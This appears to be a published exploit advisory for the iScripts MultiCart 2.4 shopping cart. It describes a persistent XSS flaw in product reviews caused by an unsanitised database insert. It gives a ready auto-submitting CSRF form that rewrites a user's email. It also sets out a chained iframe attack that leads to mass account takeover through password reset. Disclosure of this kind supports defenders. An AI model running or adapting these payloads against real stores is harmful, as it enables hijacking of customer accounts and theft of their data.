# Exploit Title : iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover # Date : 2013/12/14 # Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com # Software Link : http://www.iscripts.com # Author HomePage: http://security-geeks.blogspot.com # Tested on: Server : Apache/2.2.15 PHP/5.3.3 # Cross-site Scripting iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which attacker can manipulate user data via sending him malicious craft url. XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients. In Product_review.php line 52--- Persistent XSS mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."', '".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error()); $_POST['txtReview'] is inserted without sanitizing. Exploitation Goto http://site.tld/product_review.php?pid=[any product id] Paste your xss vector and submit. XSS vector will be executed here http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review. # Cross-site request forgery <html> <body onload="javascript:document.forms[0].submit()"> <form name="ex"action="http://localhost/profile.php" method=post > <input type=hidden size=30 maxlength=30 name=userid value="5"> <input type=hidden size=30 maxlength=30 name=txtFirstName value="admin"> <input type=hidden size=30 maxlength=100 name=txtLastName value="admin"> <input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com"> <input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf"> <input type=hidden size=30 maxlength=30 name=txtCity value="saf"> <input type=hidden size=30 maxlength=30 name=bill_country value="DZ"> <input type=hidden size=30 maxlength=30 name=bill_state value="adsf"> <input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes"> <input type=submit name=btnSaveChanges class=button value='Save'> </form> </html> # XSS+CSRF Mass Email Change /Mass Account Takeover XSS+CSRF can be used to change mass user email , after changing the email we can change the password too via forget password option and providing email. Just inject a CSRF iframe as XSS vector on product_review.php E.g <iframe src="http://www.site.tld/inject.html"></iframe> Inject.html ---> CRSF exploit So now whenever user browse different products their useremail will be changed automatically. #Independent Pakistani Security ResearcherБрой прочитания на тази страница: 1179
iScripts MultiCart <= 2.4 – Persistent XSS / CSRF / XSS+CSRF Mass Accounts takeover